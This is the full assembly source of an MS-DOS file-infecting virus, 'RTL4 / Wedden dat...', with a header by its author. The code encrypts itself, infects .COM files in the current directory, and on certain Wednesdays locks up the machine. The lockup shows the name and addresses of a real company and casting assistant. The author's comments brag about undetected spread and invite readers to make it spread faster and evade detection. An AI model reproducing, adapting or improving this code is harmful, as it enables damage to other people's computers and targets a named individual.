;****************************************************************************** ; ; RTL4 / WEDDEN DAT... VIRUS ; ;****************************************************************************** ; ; "If a weaking linkage found, eliminate... ; Hear the cities fearfull roar!" ; ; Now in front of you lies another source of a virus. It is not a very good ; one, but, as you might say, a virus is a virus. After my wake at the PC, I ; created several viruses, like: ; ; Deicide / Glenn ; Morgoth ; Breeze ; Brother ; Commentator I ; Commentator II ; Spawnie ; Xmas ; 1St_Star / 222 ; T-1000 ; ; Well, I bet you think this is a whole lot, but some are minor variants, for ; which I don't have the guts to publish the source code. I have to admid, ; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it ; was downloaded several times, and it is not detected by antivirus program yet. ; Deicide is now detectable, but that was my first attempt to make a virus. ; ; This virus is a Non-Resident Direct Action .COM Infector. ; It only infects files in the current directory. ; You can recognize a infected file simply, the 4th byte is a '*' (just like ; the 1St_Star virus). It is inactive from January till May and starts ; replicating from May. After July, every Wednessday after the 21st the ; program will hang the system, showing the address of RTL4 Joop v/d Ende ; Productions. ; ; Disclaimer : This program is like all other virus sources only for ; educational purposes and should not be given to irresponsible hands ; (John McAfee and people like him). ; ; For the criminal reader : Don't just change the text of this virus and ; say you made a virus. Instead use some ideas from this virus and create your ; own virus if you want to be nasty. Additions to this virus that makes it ; spreading faster and makes it harder to detect are welcome, as long as I get ; the new source code. ; ; I want to thank several virus writers for their support with letting McAfee ; and Ass. earn his money with making so many updates of SCAN... ; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker ; Jack and many more creators. ; ; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost ; the source code. Next time write a message, because I might have the source ; code of the virus ready, but not uploaded. It saves you time, so you may ; disassemble another virus (ofcourse only for educational purposes ;-) ) ; ; Now have fun with this virus, written in A86 assembler version 3.22 ; ; Glenn Benton ; ; "Is it truly a disembodied head lurking in the dark of the tombs of fate?" ; Org 0h ; The outcome will be .BIN Start: Jmp MainVir ; Jump to main virus Db '*' ; signature MainVir: Call On1 ; Get virus offset On1: Pop BP ; BP is the index register Sub BP,Offset MainVir+3 ; Calculate virus offset Push Ax ; And store AX (error reg.) Lea Si,Crypt[BP] ; Decryptor for the Mov Di,Si ; virus code. It's long Mov Cx,CryptLen ; for a decoder, but it Decrypt: Lodsb ; reduces the recognizable Xor Al,0 ; part enough. Stosb ; Loop Decrypt ; DecrLen Equ $-MainVir ; Decryptor length Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store the 4 first bytes Mov Bx,Cs:OrgPrg[BP]+2 ; of the host Mov Cs:Start+100h,Ax ; Mov Cs:Start[2]+100h,Bx ; Mov Ah,2ah ; Get date Int 21h ; If it is a wednessday Cmp Dh,8 ; after July and after Jb NoMsg ; the 21st, it will Cmp Dl,22 ; will continue, else Jb NoMsg ; it goes to NoMsg Cmp Al,3 ; Jne NoMsg ; Mov Ah,9 ; Display the message Lea Dx,Msg[BP] ; Int 21h ; Lockout: Cli ; And lock the computer Jmp Lockout ; NoMsg: Cmp Dh,5 ; Is it after April? Jae DoVirus ; Yes - Replicate Jmp Ready ; No - Terminate to host DoVirus: Mov Ah,1ah ; Move DTA to a safe place Mov Dx,0fc00h ; $FE00 Int 21h Mov Ah,4eh ; Search: Lea Dx,FileSpec[BP] ; Search for a .COM file in Xor Cx,Cx ; the current directory Int 21h ; Jnc Found ; If not exist, goto Ready Jmp Ready ; else goto Found Found: Mov Ax,4300h ; Get file attributes Mov Dx,0fc1eh ; and store them on the stack Int 21h ; Push Cx ; Mov Ax,4301h ; Wipe the attributes, so it Xor Cx,Cx ; is accessable for us Int 21h ; Mov Ax,3d02h ; Open the file with Int 21h ; read/write priority Mov Bx,5700h ; Get de file date/time stamp Xchg Ax,Bx ; and store them on the stack Int 21h ; Push Cx ; Push Dx ; Mov Ah,3fh ; Read the first 4 bytes Lea Dx,OrgPrg[BP] ; of the program Mov Cx,4 ; Int 21h ; Mov Ax,Cs:[OrgPrg][BP] ; Is it a weird EXE? Cmp Ax,'MZ' ; Yes goto ExeFile Je ExeFile ; Cmp Ax,'ZM' ; Is it a normal EXE? Je ExeFile ; Yes, goto ExeFile Mov Ah,Cs:[OrgPrg+3][BP] ; Is it already infected? Cmp Ah,'*' ; No, goto Infect Jne Infect ; ExeFile: Call Close ; Call File close Mov Ah,4fh ; Jump to the search routine Jmp Search ; again for a .COM file FSeek: Xor Cx,Cx ; Subroutine for jumping to Xor Dx,Dx ; the begin/end of file Int 21h ; Ret ; Infect: Mov Ax,4202h ; Jump to EOF Call FSeek ; Sub Ax,3 ; Calculate new virus offset Mov Cs:CallPtr[BP]+1,Ax ; Mov Ah,2ch ; Get system time Int 21h ; Mov Cs:Decrypt+2[BP],Dl ; Move the decryptor part Lea Si,MainVir[BP] ; with the 100ds second put Mov Di,0fd00h ; into the XOR command to Mov Cx,DecrLen ; the end of the 64K segment Rep Movsb ; Lea Si,Crypt[BP] ; Encrypt the virus with Mov Cx,CryptLen ; the 100ds seconds. Encrypt: Lodsb ; Merge it behind the Xor Al,Dl ; decryptor Stosb ; Loop Encrypt ; Mov Ah,40h ; Write the virus Lea Dx,0fd00h ; at the end of the Mov Cx,VirLen ; file Int 21h ; Mov Ax,4200h ; Move to start of Call FSeek ; the file Mov Ah,40h ; Write the jump to the virus Lea Dx,CallPtr[BP] ; at the begin of the file Mov Cx,4 ; Int 21h ; Call Close ; Close the file Ready: Mov Ah,1ah ; Restore the DTA to the Mov Dx,80h ; original offset Int 21h ; Pop Ax ; Get (possible) error code Mov Bx,100h ; Strange jump (but nice) to Push Cs ; the begin of the program Push Bx ; (which has been restored) Retf ; Close: Pop Si ; A pop which is stupid Pop Dx ; Restore files date/time Pop Cx ; stamp Mov Ax,5701h ; Int 21h ; Mov Ah,3eh ; Close file Int 21h ; Mov Ax,4301h ; Restore attributes Pop Cx ; Mov Dx,0fc1eh ; Int 21h ; Push Si ; A push which is stupid Ret ; Return to caller CallPtr Db 0e9h,0,0 ; Jump FileSpec Db '*.COM',0 ; Filesearch spec & signature ; Activation message Msg Db 13,10,9,9,'RTL4' Db 13,10,'Joop van den Ende Produkties BV' Db 13,10,'Marco Daas (Casting Assistent)' Db 13,10,'Postbus 397' Db 13,10,'1430 AJ AALSMEER' Db 13,10,'van Cleeffkade 15' Db 13,10,'1413 BA AALSMEER' Db 13,10,'The Netherlands' Db 13,10,10,'Wedden dat... je een virus hebt?' Db 13,10,'$' ; First 4 bytes of the host program OrgPrg: Int 20h DB 'GB' ; My initials (Glenn Benton) CryptLen Equ $-Crypt ; Length of encrypted part VirLen Equ $-MainVir ; Length of virus ; ; Sleep well, sleep in hell... ; ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ